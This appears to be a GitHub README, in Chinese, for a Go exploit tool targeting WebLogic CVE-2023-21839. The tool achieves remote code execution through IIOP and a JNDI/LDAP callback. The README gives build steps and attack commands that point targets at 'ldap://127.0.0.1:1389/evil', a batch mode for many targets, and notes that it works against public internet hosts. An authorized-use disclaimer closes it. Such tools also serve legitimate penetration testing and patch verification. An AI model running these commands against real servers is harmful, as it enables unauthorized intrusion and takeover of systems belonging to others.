/CVE-2023-21839

Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)

Primary LanguageGo

CVE-2023-21839

未经授权许可使用本项目攻击或测试目标是非法的,本程序应仅用于授权的安全测试与研究目的

介绍

Weblogic CVE-2023-21839 RCE

(1)无需任何 Java 依赖,构造协议通过socket直接RCE

(2)已解决 IIOP 的 NAT 网络问题(可测试 Docker 与公网目标)

(3)在 Windows/Mac OS/Linux 以及 Weblogic 12/14 中测试通过

(4)请使用 JDK 8u191 以下启动 Weblogic 并自行搭建 JNDI Server

使用

Linux/Mac OS

cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

Windows

cd cmd
go build -o CVE-2023-21839.exe
CVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

新增多目标检测

CVE-2023-21839.exe -file target.txt -ldap ldap://127.0.0.1:1389/evil

target.txt的格式

127.0.0.1:7001

通过ip md5的前五位来定位,部分站点测试会卡死,暂时不知道咋解决 如果发现 panic 或有其他报错,说明目标不存在漏洞(或关闭了 IIOP 功能)

本地测试:

某师傅公网测试:

免责声明

此工具仅作为网络安全攻防研究交流,请使用者遵照网络安全法合理使用!

如果使用者使用该工具出现任何非法攻击等违法行为,与作者无关!